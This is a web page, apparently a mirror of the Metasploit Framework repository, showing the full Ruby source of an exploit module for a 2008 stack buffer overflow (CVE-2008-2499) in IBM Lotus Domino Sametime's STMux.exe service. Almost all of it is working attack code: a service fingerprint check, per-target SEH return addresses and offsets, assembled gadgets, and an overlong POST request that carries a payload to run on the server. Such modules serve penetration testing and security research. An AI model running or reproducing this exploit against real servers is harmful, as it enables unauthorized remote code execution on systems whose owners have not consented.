Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/lotus/domino_sametime_stmux.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Lotus Domino\'s Sametime15Server. By sending an overly long POST request to the Multiplexer16STMux.exe service we are able to overwrite SEH. Based on the exploit17by Manuel Santamarina Suarez.18},19'Author' => [ 'aushack', 'riaf <riaf[at]mysec.org>' ],20'Arch' => [ ARCH_X86 ],21'License' => MSF_LICENSE,22'References' =>23[24[ 'CVE', '2008-2499' ],25[ 'OSVDB', '45610' ],26[ 'BID', '29328' ],27[ 'ZDI', '08-028' ],28],29'Privileged' => true,30'DefaultOptions' =>31{32'EXITFUNC' => 'seh',33},34'Payload' =>35{36'Space' => 1024,37'BadChars' => "\x00\x0a\x0d",38'StackAdjustment' => -3500,39},40'Platform' => ['win'],41'Targets' =>42[43# Patrick - Tested OK against Windows 2003 SP1 2008111444[ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll45[ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll46[ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],47[ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],48[ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],49],50'DisclosureDate' => '2008-05-21',51'DefaultTarget' => 1))5253register_options(54[55Opt::RPORT(1533),56])57end5859def check60connect6162req = "HEAD / HTTP/1.1\r\n"63req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"64req << "User-Agent: Sametime Community Agent\r\n\r\n"6566sock.put(req)67res = sock.get_once || ''6869disconnect7071if (res.to_s =~/Lotus-Domino/)72connect7374req = "GET /CommunityCBR HTTP/1.1\r\n"75req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"76req << "User-Agent: Sametime Community Agent\r\n\r\n"77sock.put(req)78res = sock.get_once || ''7980disconnect8182if (res.to_s =~ /200 OK/)83return Exploit::CheckCode::Detected84end85end8687return Exploit::CheckCode::Safe88end8990def exploit91connect9293pad1 = rand_text_alpha_lower(44)94pad2 = rand_text_alpha_lower(29)9596# Patrick - We should use Metasm here.97popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]98popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]99esp = "\xff\x24\x24" # dword ptr ss:[esp]100jmp = "\x74\x23" + "\x75\x21" # je short, jnz short101seh = [target['Ret']].pack('V')102103path = pad1 + jmp + seh + pad2 + popebx + popad + esp104105req = "POST /CommunityCBR/CC.39.#{path}/\r\n"106req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"107req << "User-Agent: Sametime Community Agent\r\n"108req << "Content-Length: #{payload.encoded.length}\r\n"109req << "Connection: Close\r\n"110req << "Cache-Control: no-cache\r\n\r\n"111req << payload.encoded112113sock.put(req)114115handler116disconnect117end118end119120121